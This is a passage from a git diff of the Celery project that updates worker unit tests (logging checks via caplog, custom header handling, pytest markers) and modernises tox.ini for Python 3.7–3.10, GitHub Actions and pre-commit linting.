weakref_ref = Mock(name='weakref.ref')
job = self.zRequest(id=uuid(),
revoked_tasks=set(),
@@ -1187,7 +1312,7 @@ def test_execute_using_pool_with_none_timelimit_header(self):
headers={'timelimit': None})
job.execute_using_pool(self.pool)
self.pool.apply_async.assert_called_with(
- trace,
+ trace_task_ret,
args=(job.type, job.id, job.request_dict, job.body,
job.content_type, job.content_encoding),
accept_callback=job.on_accepted,
@@ -1204,8 +1329,9 @@ def test_execute_using_pool_with_none_timelimit_header(self):
def test_execute_using_pool__defaults_of_hybrid_to_proto2(self):
weakref_ref = Mock(name='weakref.ref')
- headers = strategy.hybrid_to_proto2('', {'id': uuid(),
- 'task': self.mytask.name})[1]
+ headers = strategy.hybrid_to_proto2(
+ Mock(headers=None), {'id': uuid(), 'task': self.mytask.name},
+ )[1]
job = self.zRequest(revoked_tasks=set(), ref=weakref_ref, **headers)
job.execute_using_pool(self.pool)
assert job._apply_result
diff --git a/t/unit/worker/test_strategy.py b/t/unit/worker/test_strategy.py
index 6b93dab74d9..8d7098954af 100644
--- a/t/unit/worker/test_strategy.py
+++ b/t/unit/worker/test_strategy.py
@@ -1,3 +1,4 @@
+import logging
from collections import defaultdict
from contextlib import contextmanager
from unittest.mock import ANY, Mock, patch
@@ -6,6 +7,7 @@
from kombu.utils.limits import TokenBucket
from celery import Task, signals
+from celery.app.trace import LOG_RECEIVED
from celery.exceptions import InvalidTaskError
from celery.utils.time import rate
from celery.worker import state
@@ -142,12 +144,14 @@ def _context(self, sig,
message = self.prepare_message(message)
yield self.Context(sig, s, reserved, consumer, message)
- def test_when_logging_disabled(self):
+ def test_when_logging_disabled(self, caplog):
+ # Capture logs at any level above `NOTSET`
+ caplog.set_level(logging.NOTSET + 1, logger="celery.worker.strategy")
with patch('celery.worker.strategy.logger') as logger:
logger.isEnabledFor.return_value = False
with self._context(self.add.s(2, 2)) as C:
C()
- logger.info.assert_not_called()
+ assert not caplog.records
def test_task_strategy(self):
with self._context(self.add.s(2, 2)) as C:
@@ -165,6 +169,33 @@ def test_callbacks(self):
for callback in callbacks:
callback.assert_called_with(req)
+ def test_log_task_received(self, caplog):
+ caplog.set_level(logging.INFO, logger="celery.worker.strategy")
+ with self._context(self.add.s(2, 2)) as C:
+ C()
+ for record in caplog.records:
+ if record.msg == LOG_RECEIVED:
+ assert record.levelno == logging.INFO
+ break
+ else:
+ raise ValueError("Expected message not in captured log records")
+
+ def test_log_task_received_custom(self, caplog):
+ caplog.set_level(logging.INFO, logger="celery.worker.strategy")
+ custom_fmt = "CUSTOM MESSAGE"
+ with self._context(
+ self.add.s(2, 2)
+ ) as C, patch(
+ "celery.app.trace.LOG_RECEIVED", new=custom_fmt,
+ ):
+ C()
+ for record in caplog.records:
+ if record.msg == custom_fmt:
+ assert set(record.args) == {"id", "name", "kwargs", "args"}
+ break
+ else:
+ raise ValueError("Expected message not in captured log records")
+
def test_signal_task_received(self):
callback = Mock()
with self._context(self.add.s(2, 2)) as C:
@@ -247,7 +278,7 @@ def test_custom_request_gets_instantiated(self):
class MyRequest(Request):
def __init__(self, *args, **kwargs):
- Request.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
_MyRequest()
class MyTask(Task):
@@ -271,7 +302,7 @@ def failed():
class test_hybrid_to_proto2:
def setup(self):
- self.message = Mock(name='message')
+ self.message = Mock(name='message', headers={"custom": "header"})
self.body = {
'args': (1,),
'kwargs': {'foo': 'baz'},
@@ -288,3 +319,7 @@ def test_retries_custom_value(self):
self.body['retries'] = _custom_value
_, headers, _, _ = hybrid_to_proto2(self.message, self.body)
assert headers.get('retries') == _custom_value
+
+ def test_custom_headers(self):
+ _, headers, _, _ = hybrid_to_proto2(self.message, self.body)
+ assert headers.get("custom") == "header"
diff --git a/t/unit/worker/test_worker.py b/t/unit/worker/test_worker.py
index aedf852788f..c6733e97d1c 100644
--- a/t/unit/worker/test_worker.py
+++ b/t/unit/worker/test_worker.py
@@ -11,7 +11,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection
from kombu.asynchronous import get_event_loop
from kombu.common import QoS, ignore_errors
@@ -804,8 +803,8 @@ def test_with_autoscaler(self):
assert worker.autoscaler
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_autoscaler_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_autoscaler_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance with auto scaling
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
@@ -853,8 +852,8 @@ def test_with_autoscaler_file_descriptor_safety(self):
worker.pool.terminate()
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
@@ -893,7 +892,7 @@ def throw_file_not_found_error(*args, **kwargs):
worker.pool._pool.on_poll_start()
# Then: test did not raise OSError
- # Given: a mock object that fakes whats required to do whats next
+ # Given: a mock object that fakes what's required to do what's next
proc = Mock(_sentinel_poll=42)
# When: Calling again to register with event loop ...
diff --git a/tox.ini b/tox.ini
index 1b12965923a..39cfcb5e198 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,35 +1,50 @@
[tox]
+requires =
+ tox-gh-actions
envlist =
- {3.6,3.7,3.8,3.9-dev,pypy3}-unit
- {3.6,3.7,3.8,3.9-dev,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
+ {3.7,3.8,3.9,3.10,pypy3}-unit
+ {3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
flake8
apicheck
configcheck
bandit
+
+[gh-actions]
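+# Map the GitHub Actions python-version to the tox environments to run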
+python =
+ 3.7: 3.7-unit
+ 3.8: 3.8-unit
+ 3.9: 3.9-unit
+ 3.10: 3.10-unit
+ pypy-3: pypy3-unit
+
[testenv]
+sitepackages = False
+recreate = False
+passenv =
+ AZUREBLOCKBLOB_URL
+
deps=
-r{toxinidir}/requirements/default.txt
-r{toxinidir}/requirements/test.txt
-r{toxinidir}/requirements/pkgutils.txt
- 3.6,3.7,3.8,3.9-dev: -r{toxinidir}/requirements/test-ci-default.txt
- 3.5,3.6,3.7,3.8,3.9-dev: -r{toxinidir}/requirements/docs.txt
- 3.6,3.7,3.8,3.9-dev: -r{toxinidir}/requirements/docs.txt
- pypy3: -r{toxinidir}/requirements/test-ci-base.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
+ pypy3: -r{toxinidir}/requirements/test-ci-default.txt
integration: -r{toxinidir}/requirements/test-integration.txt
linkcheck,apicheck,configcheck: -r{toxinidir}/requirements/docs.txt
- flake8: -r{toxinidir}/requirements/pkgutils.txt
+ lint: pre-commit
bandit: bandit
-sitepackages = False
-recreate = False
+
commands =
- unit: pytest -xv --cov=celery --cov-report=xml --cov-report term {posargs}
+ unit: pytest --maxfail=10 -v --cov=celery --cov-report=xml --cov-report term {posargs}
integration: pytest -xsv t/integration {posargs}
setenv =
+ PIP_EXTRA_INDEX_URL=https://celery.github.io/celery-wheelhouse/repo/simple/
BOTO_CONFIG = /dev/null
WORKER_LOGLEVEL = INFO
PYTHONIOENCODING = UTF-8
@@ -56,19 +71,17 @@ setenv =
azureblockblob: TEST_BROKER=redis://
azureblockblob: TEST_BACKEND=azureblockblob://DefaultEndpointsProtocol=http;AccountName=devstoreaccount1;AccountKey=Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==;BlobEndpoint=http://127.0.0.1:10000/devstoreaccount1;
-passenv =
- TRAVIS
- AZUREBLOCKBLOB_URL
+
basepython =
- 3.6: python3.6
3.7: python3.7
3.8: python3.8
- 3.9-dev: python3.9
+ 3.9: python3.9
+ 3.10: python3.10
pypy3: pypy3
- flake8,apicheck,linkcheck,configcheck,bandit: python3.8
- flakeplus: python2.7
+ lint,apicheck,linkcheck,configcheck,bandit: python3.9
usedevelop = True
+
[testenv:apicheck]
setenv =
PYTHONHASHSEED = 100
@@ -87,6 +100,6 @@ commands =
commands =
bandit -b bandit.json -r celery/
-[testenv:flake8]
+[testenv:lint]
commands =
- flake8 -j 2 {toxinidir}
+ pre-commit {posargs:run --all-files --show-diff-on-failure}